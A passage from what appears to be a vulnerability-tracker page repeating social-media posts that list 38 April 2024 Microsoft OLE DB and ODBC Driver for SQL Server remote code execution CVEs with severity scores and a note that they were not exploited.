  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28943
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:37

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29984
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:37

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29044
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:37

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
